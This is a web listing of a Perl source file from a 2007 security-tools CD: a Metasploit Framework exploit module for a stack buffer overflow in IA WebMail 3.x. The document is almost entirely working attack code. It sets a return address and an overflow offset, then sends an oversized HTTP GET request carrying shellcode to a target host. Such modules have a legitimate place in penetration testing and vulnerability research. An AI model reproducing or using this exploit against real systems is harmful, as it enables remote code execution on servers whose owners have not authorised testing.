home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / ia_webmail.pm < prev    next >
Encoding:
Perl POD Document  |  2006-06-30  |  2.6 KB  |  103 lines
  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::ia_webmail;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.     'Name'  => 'IA WebMail 3.x Buffer Overflow',
  20.     'Version'  => '$Revision: 1.24 $',
  21.     'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
  22.  
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'win32', 'win2000' ],
  25.     'Priv'  => 0,
  26.  
  27.     'UserOpts'  =>
  28.       {
  29.         'RHOST' => [1, 'ADDR', 'The target address'],
  30.         'RPORT' => [1, 'PORT', 'The target port', 80],
  31.       },
  32.  
  33.     'Payload' =>
  34.       {
  35.         'Space'  => 1024,
  36.         'BadChars'  => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
  37.       },
  38.  
  39.     'Description'  =>  Pex::Text::Freeform(qq{
  40.         This exploits a stack overflow in the IA WebMail server. This
  41.         exploit has not been tested against a live system at this time.
  42. }),
  43.  
  44.     'Refs'  =>
  45.       [
  46.         ['OSVDB', 2757],
  47.         ['URL',   'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
  48.         ['MIL',   '24'],
  49.       ],
  50.  
  51.     'DefaultTarget' => 0,
  52.     'Targets' => [['IA WebMail 3.x', 1036, 0x1002bd33]],
  53.  
  54.     'Keys' => ['iawebmail'],
  55.  
  56.     'DisclosureDate' => 'Nov 3 2003',
  57.   };
  58.  
  59. sub new {
  60.     my $class = shift;
  61.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  62.     return($self);
  63. }
  64.  
  65. # This exploit based on http://www.k-otik.net/exploits/11.19.iawebmail.pl.php
  66. sub Exploit {
  67.     my $self = shift;
  68.     my $target_host = $self->GetVar('RHOST');
  69.     my $target_port = $self->GetVar('RPORT');
  70.     my $target_idx  = $self->GetVar('TARGET');
  71.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  72.  
  73.     my @targets = @{$self->Targets};
  74.     my $target = $targets[$target_idx];
  75.  
  76.     $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
  77.  
  78.     my $request = "GET /" . ("o" x $target->[1]) . "META" .
  79.       pack("V", $target->[2]). $shellcode .
  80.       " HTTP/1.0\r\n\r\n";
  81.  
  82.     my $s = Msf::Socket::Tcp->new
  83.       (
  84.         'PeerAddr'  => $target_host,
  85.         'PeerPort'  => $target_port,
  86.         'LocalPort' => $self->GetVar('CPORT'),
  87.         'SSL'       => $self->GetVar('SSL'),
  88.       );
  89.     if ($s->IsError) {
  90.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  91.         return;
  92.     }
  93.  
  94.     $self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
  95.     $s->Send($request);
  96.  
  97.     $self->PrintLine("[*] Waiting for a response...");
  98.     my $r = $s->Recv(-1, 5);
  99.     sleep(2);
  100.     $s->Close();
  101.     return;
  102. }
  103.